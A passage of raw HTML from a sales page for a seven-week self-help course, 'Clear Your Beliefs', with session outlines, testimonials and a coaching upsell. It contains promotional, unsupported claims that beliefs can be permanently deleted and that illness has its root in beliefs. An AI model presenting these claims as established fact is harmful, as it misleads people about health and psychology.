underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly 